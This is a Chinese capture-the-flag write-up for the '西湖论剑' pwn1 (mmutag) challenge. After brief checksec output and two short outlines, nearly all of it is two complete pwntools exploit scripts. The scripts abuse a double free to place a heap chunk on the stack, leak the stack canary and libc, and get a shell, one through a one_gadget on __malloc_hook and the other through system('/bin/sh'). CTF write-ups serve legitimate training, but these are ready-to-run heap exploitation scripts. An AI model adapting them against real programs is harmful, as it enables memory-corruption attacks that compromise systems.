0%

西湖论剑

5f80205552d10.jpg

pwn1

这里我赛后看了其他师傅的wp,用了俩种方法进行复现。

checksec检查:

1
2
3
4
5
Arch:     amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

利用(第一种方法):

  1. 程序中存在double free漏洞,还给了栈地址。考虑首先将堆申请到栈上控制返回地址,泄露libc
  2. 然后再通过再将one_gadget写到malloc_hook上,发现不行,尝试进行realloc_hook抬高栈。
  3. 最后连续free俩次,触发double free 检测。double free检测会调用malloc。

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#! /usr/bin/env python 

from pwn import *

sh = process('./mmutag')
elf = ELF('./mmutag')
libc=ELF('./libc.so.6')
#context.log_level = 'debug'

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
read_plt=elf.plt['read']
pop_ret=0x0000000000400d23

def welcome(introduce):
sh.recvuntil('please input your choice:\n')
sh.sendline('1')
sh.recvuntil('please input your introduce \n')
sh.sendline(introduce)

def yourself():
sh.recvuntil('please input your choice:\n')
sh.sendline('2')

def add(index,content):
sh.recvuntil('please input your choise:\n')
sh.sendline('1')
sh.recvuntil('please input your id:\n')
sh.sendline(str(index))
sh.recvuntil('input your content\n')
sh.send(content)

def free(index):
sh.recvuntil('please input your choise:\n')
sh.sendline('2')
sh.recvuntil('please input your id:\n')
sh.sendline(str(index))

def canary():
sh.recvuntil('please input your choise:\n')
sh.sendline('3')
sh.send('a'*23+'b'+'a')
sh.recvuntil('b')
canary=u64(sh.recv(8))-0x61
sh.success('canary : ' +hex(canary))
return canary

def fakechunk():
sh.recvuntil('please input your choise:\n')
sh.sendline('3')
sh.sendline(p64(0)+p64(0x71)+p64(0)+'\x00')

sh.recvuntil('please input you name: \n')
sh.sendline('aaaaaaaa')
sh.recvuntil('this is your tag: ')
stack_buf_addr=int(sh.recv(14),16)

print 'stack_buf_addr : ',hex(stack_buf_addr)
stack_addr = stack_buf_addr - 0x40
sh.success('stack_addr : ' +hex(stack_addr))

welcome('aaaaaa')
yourself()
add(1,'aaaaaa')
add(2,'bbbbbb')
free(1)
free(2)
free(1)

canary=canary()
fakechunk()

main_addr=0x0000000000400BF1
add(3,p64(stack_addr))
add(4,'a'*8)
add(5,'a'*8)
add(6,'a'*8+p64(canary)+p64(0)+p64(pop_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr))

sh.recvuntil('please input your choise:\n')
sh.sendline('4')
puts_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
sh.success('puts_addr : ' +hex(puts_addr))
libc_base=puts_addr-libc.symbols['puts']
sh.success('libc_base : ' +hex(libc_base))
malloc_hook=libc_base+libc.symbols['__malloc_hook']
sh.success('malloc_hook : ' +hex(malloc_hook))
one_gadget=libc_base + 0x4527A
sh.success('one_gadget : ' +hex(one_gadget))
realloc=libc_base+libc.symbols['realloc']
sh.success('realloc : ' +hex(realloc))

sh.recvuntil('please input you name: \n')
sh.sendline('aaaaaaaa')
welcome('aaaaaa')
yourself()

free(1)
free(2)
free(1)
add(7,p64(malloc_hook-0x23))
add(8,'a'*8)
add(9,'b'*8)
add(10,'a'*3+'b'*8+p64(one_gadget)+p64(realloc+4))
#gdb.attach(sh)
free(1)
free(1)


#gdb.attach(sh)
sh.interactive()

利用(第二种方法):

  1. 将堆申请到栈上,泄露libc
  2. 再次将堆申请到栈上,控制返回地址getshell

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#! /usr/bin/env python


from pwn import *

sh = process('./mmutag')
elf = ELF('./mmutag')
libc=ELF('./libc.so.6')
#context.log_level = 'debug'

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_ret=0x0000000000400d23

def welcome(introduce):
sh.recvuntil('please input your choice:\n')
sh.sendline('1')
sh.recvuntil('please input your introduce \n')
sh.sendline(introduce)

def yourself():
sh.recvuntil('please input your choice:\n')
sh.sendline('2')

def add(index,content):
sh.recvuntil('please input your choise:\n')
sh.sendline('1')
sh.recvuntil('please input your id:\n')
sh.sendline(str(index))
sh.recvuntil('input your content\n')
sh.send(content)

def free(index):
sh.recvuntil('please input your choise:\n')
sh.sendline('2')
sh.recvuntil('please input your id:\n')
sh.sendline(str(index))

def canary():
sh.recvuntil('please input your choise:\n')
sh.sendline('3')
sh.send('a'*23+'b'+'a')
sh.recvuntil('b')
canary=u64(sh.recv(8))-0x61
sh.success('canary : ' +hex(canary))
return canary

def fakechunk():
sh.recvuntil('please input your choise:\n')
sh.sendline('3')
sh.sendline(p64(0)+p64(0x71)+p64(0)+'\x00')

sh.recvuntil('please input you name: \n')
sh.sendline('aaaaaaaa')
sh.recvuntil('this is your tag: ')
stack_buf_addr=int(sh.recv(14),16)

print 'stack_buf_addr : ',hex(stack_buf_addr)
stack_addr = stack_buf_addr - 0x40
sh.success('stack_addr : ' +hex(stack_addr))

welcome('aaaaaa')
yourself()
add(1,'aaaaaa')
add(2,'bbbbbb')
free(1)
free(2)
free(1)

canary=canary()
fakechunk()

main_addr=0x0000000000400BF1
add(3,p64(stack_addr))
add(4,'a'*8)
add(5,'a'*8)
add(6,'a'*8+p64(canary)+p64(0)+p64(pop_ret)+p64(puts_got)+p64(puts_plt)+p64(main_addr))

sh.recvuntil('please input your choise:\n')
sh.sendline('4')
puts_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
sh.success('puts_addr : ' +hex(puts_addr))
libc_base=puts_addr-libc.symbols['puts']
sh.success('libc_base : ' +hex(libc_base))
system_addr=libc_base+libc.symbols['system']
sh.success('system_addr : ' +hex(system_addr))
bin_sh_addr=libc_base+0x18ce17
sh.success('bin_sh_addr : ' +hex(bin_sh_addr))

sh.recvuntil('please input you name: \n')
sh.sendline('aaaaaaaa')
welcome('aaaaaa')
yourself()

fakechunk()
free(1)
free(2)
free(1)
add(7,p64(stack_addr-0x10))
add(8,'a'*8)
add(9,'b'*8)
add(10,p64(0)+p64(canary)+p64(0)+p64(pop_ret)+p64(bin_sh_addr)+p64(system_addr)+p64(main_addr))

sh.recvuntil('please input your choise:\n')
sh.sendline('4')

#gdb.attach(sh)
sh.interactive()

剩下题目有时间在复现。